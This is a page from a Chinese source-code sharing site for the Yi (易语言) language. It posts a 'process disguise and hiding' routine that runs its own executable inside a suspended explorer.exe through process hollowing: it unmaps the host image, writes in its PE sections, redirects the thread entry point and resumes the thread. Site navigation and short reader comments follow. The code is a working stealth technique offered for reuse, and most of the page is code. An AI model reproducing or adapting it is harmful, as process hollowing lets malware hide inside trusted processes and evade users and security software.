网站首页 > 易语言相关 > 易语言例程 正文
部分代码:
.版本 2 .支持库 EThread .支持库 shell .支持库 eAPI .程序集 窗口程序集_启动窗口 .子程序 __启动窗口_创建完毕 启动线程 (&伪装进程隐藏, , ) .子程序 伪装进程隐藏 .如果真 (读配置项 (取特定目录 (11) + “” + “临时配置文件.ini”, “是否首次运行”, “标志”, ) = “”) 写配置项 (取特定目录 (11) + “” + “临时配置文件.ini”, “是否首次运行”, “标志”, “1”) .如果真 (附加进程运行 () = 假) .如果真 (附加进程运行 () = 假) 删除文件 (取特定目录 (11) + “临时配置文件.ini”) 终止进程 (取执行文件名 ()) .如果真结束 .如果真结束 .如果真结束 .如果真 (读配置项 (取特定目录 (11) + “临时配置文件.ini”, “是否首次运行”, “标志”, ) = “1”) .如果真 (取执行文件名 () ≠ “explorer.exe”) 删除文件 (取特定目录 (11) + “临时配置文件.ini”) 终止进程 (取执行文件名 ()) .如果真结束 删除文件 (取特定目录 (11) + “临时配置文件.ini”) .如果真结束 .子程序 附加进程运行, 逻辑型 .局部变量 idh, IMAGE_DOS_HEADER .局部变量 inh, IMAGE_NT_HEADERS .局部变量 ish, IMAGE_SECTION_HEADER .局部变量 si, STARTUPINFO_x .局部变量 context, CONTEXT86 .局部变量 ImageBase, 整数型 .局部变量 i, 整数型 .局部变量 addr, 整数型 .局部变量 lOffset, 整数型 .局部变量 DeskCpl, DeskCpl .局部变量 Rom, 字节集 连续赋值 (0, DeskCpl.id, DeskCpl.handle, DeskCpl.iid, DeskCpl.ihandle) Rom = 读入文件 (取运行目录 () + “” + 取执行文件名 ()) RtlMoveMemory_IMAGE_DOS_HEADER_ (idh, Rom [1], Len_idh_ (idh)) .如果真 (idh.e_magic ≠ 23117) 返回 (假) .如果真结束 RtlMoveMemory_IMAGE_NT_HEADERS (inh, Rom [idh.e_lfanew + 1], Len_inh_ (inh)) .如果真 (inh.Signature ≠ 17744) 返回 (假) .如果真结束 si.cb = Len_si_ (si) si.wShowWindow = 2 .如果真 (CreateProcess_x_ (0, “explorer.exe”, 0, 0, 0, 4, 0, 0, si, DeskCpl) = 0) 返回 (假) .如果真结束 context.ContextFlags = 65538 .如果真 (GetThreadContext_ (DeskCpl.ihandle, context) = 0) ClearProcess (DeskCpl) 返回 (假) .如果真结束 ReadProcessMemory_ (DeskCpl.handle, context.Ebx + 8, addr, 4, 0) .如果真 (addr = 0) ClearProcess (DeskCpl) 返回 (假) .如果真结束 .如果真 (ZwUnmapViewOfSection_ (DeskCpl.handle, addr) = 0) ClearProcess (DeskCpl) 返回 (假) .如果真结束 ImageBase = VirtualAllocEx (DeskCpl.handle, inh.OptionalHeader.ImageBase, inh.OptionalHeader.SizeOfImage, 12288, 4) .如果真 (ImageBase = 0) ClearProcess (DeskCpl) 返回 (假) .如果真结束 WriteProcessMemory (DeskCpl.handle, ImageBase, Rom [1], inh.OptionalHeader.SizeOfHeaders, 0) lOffset = idh.e_lfanew + Len_inh_ (inh) .计次循环首 (inh.FileHeader.NumberOfSections, i) RtlMoveMemory_IMAGE_SECTION_HEADER_ (ish, Rom [lOffset + (i - 1) × 40 + 1], Len_ish (ish)) .如果真 (ish.PointerToRawData + 1 > ByteSize (Rom)) ClearProcess (DeskCpl) 返回 (假) .如果真结束 WriteProcessMemory (DeskCpl.handle, ImageBase + ish.VirtualAddress, Rom [ish.PointerToRawData + 1], ish.SizeOfRawData, 0) VirtualProtectEx (DeskCpl.handle, ImageBase + ish.VirtualAddress, ish.VirtualSize, Protect_ (ish.characteristics), addr) .计次循环尾 () WriteProcessMemory_整数35 (DeskCpl.handle, context.Ebx + 8, ImageBase, 4, 0) context.Eax = ImageBase + inh.OptionalHeader.AddressOfEntryPoint SetThreadContext (DeskCpl.ihandle, context) ResumeThread_ (DeskCpl.ihandle) CloseHandle_ (DeskCpl.ihandle) CloseHandle_ (DeskCpl.handle) 返回 (真) .子程序 Protect_, 整数型 .参数 characteristics, 整数型 返回 (多项选择 (RShift_ (characteristics, 29) + 1, 1, 16, 2, 32, 4, 64, 4, 64)) .子程序 ByteSize, 整数型 .参数 Byte, 字节集 .局部变量 code, 整数型 .局部变量 Address, 整数型 .如果真 (Byte = { }) 返回 (0) .如果真结束 置入代码 ({ 139, 93, 8, 139, 27, 139, 91, 4, 137, 93, 252 }) 返回 (code) .子程序 ClearProcess .参数 DeskCpl, DeskCpl, 参考 TerminateProcess_ (DeskCpl.handle, 0) CloseHandle_ (DeskCpl.ihandle) CloseHandle_ (DeskCpl.handle) 连续赋值 (0, DeskCpl.id, DeskCpl.handle, DeskCpl.iid, DeskCpl.ihandle) .子程序 RShift_, 整数型 .参数 lValue, 整数型 .参数 lNumberOfBitsToShift, 整数型 返回 (vbLongToULong_ (lValue) ÷ power (2, lNumberOfBitsToShift)) .子程序 power, 双精度小数型 .参数 欲求次方数值, 双精度小数型 .参数 次方数, 双精度小数型 置入代码 ({ 221, 69, 16, 221, 69, 8, 217, 241, 217, 192, 217, 252, 220, 225, 217, 201, 217, 224, 217, 240, 217, 232, 222, 193, 217, 253, 221, 217, 221, 93, 248, 139, 85, 252, 139, 69, 248, 201, 194, 16, 0 }) 返回 (0) .子程序 vbLongToULong_, 双精度小数型 .参数 Value, 双精度小数型 .如果真 (Value < 0) 返回 (Value + 4294967296) .如果真结束 返回 (Value) .子程序 _按钮1_被单击 .判断开始 (编辑框1.内容 = “123”) 信息框 (“密码正确”, 0, , ) .默认 信息框 (“密码错误”, 0, , ) .判断结束
@冷眸藐视
- 上一篇: LoRa透传示例代码
- 下一篇: 通过服务器与客户端数据交互进行MD5保护
猜你喜欢
- 2024-03-16 2024无模块静默取已登录QQ
- 2024-03-16 批量转换PPT为PDF源码
- 2024-03-15 串口相关, 虚拟串口,枚举串口,PCOMM使用
- 2024-03-14 易语言取Unix时间戳源码
- 2024-03-13 易语言源码 安卓 ADB调试桥 真机调试
- 2024-03-11 易语言控件自动缩放源码
- 2024-03-11 文本批量关键词替换源码
- 2024-03-10 Chrome浏览器操作开源,填表?自动化操作?任你发挥
- 2024-03-10 SVG转PNG dll(带易语言调用例程)
- 2024-03-09 雷电枚举进程ID对应模拟器源码
你 发表评论:
欢迎- 百度站内搜索
- 关注微信公众号
- 网站分类
-
- 网站公告
- 电子书书籍
- 程序员工具箱
- 编程工具
- 易语言相关
- 网络相关源码
- 图形图像源码
- 系统工具源码
- 易语言模块源码
- 易语言支持库
- 数据库类源码
- 易语言例程
- 易语言游戏开发
- 易语言模块
- 多媒体类源码
- 易语言资源网
- 易语言视频教程
- JS分析教程
- 易语言图文教程
- 易语言常见问题及笔记
- 工具源码
- 易语言版本
- 网络编程
- javascript
- PHP编程
- html
- 正则表达式
- 面试题
- nodejs
- 其它综合
- 脚本专栏
- python
- 按键精灵相关
- 按键精灵图文教程
- 按键精灵视频教程
- 按键精灵Q语言
- 按键精灵安卓版
- golang
- 游戏安全
- 火山相关
- 火山安卓软件
- 火山常见问题及笔记
- 火山安卓源码
- 火山视频教程
- 火山PC版本下载
- 火山PC视窗例程
- 互联网那些事
- 引流推广
- 项目揭秘
- 网络营销
- 营销软件
- QQ营销软件
- 娱乐软件
- 机器人插件
- 培训教程
- 技术教程
- 活动线报
- 数据库
- Redis
- Access
- MongoDB
- Mysql
- 问答
- 其它
- 易语言
- 需求
- 在线教程
- 多线程培训班
- 觅风易语言教程
- 模拟系列教程
- 集中营易语言教程
- 历史数据
- 随机tag
已有9位网友发表了看法:
安装依赖 评论于 [2020-08-18 18:00:05] 回复
易语言伪装进程名
编程学习 评论于 [2021-04-08 13:28:04] 回复
易语言伪装进程
源码资源库 评论于 [2021-05-06 14:35:54] 回复
进程隐藏伪装
源码资源库 评论于 [2021-05-06 14:37:18] 回复
易语言附加进程运行
yiyuyan 评论于 [2021-05-13 23:45:40] 回复
E语言隐藏进程源码
yiyuyan 评论于 [2021-05-19 16:10:33] 回复
spring可以实现程序进程的伪装嘛
资源分享 评论于 [2021-06-04 11:33:47] 回复
易语言伪装进程
资源分享 评论于 [2021-06-04 11:34:16] 回复
易语言程序伪装
资源分享 评论于 [2021-06-04 11:35:58] 回复
e语言程序伪装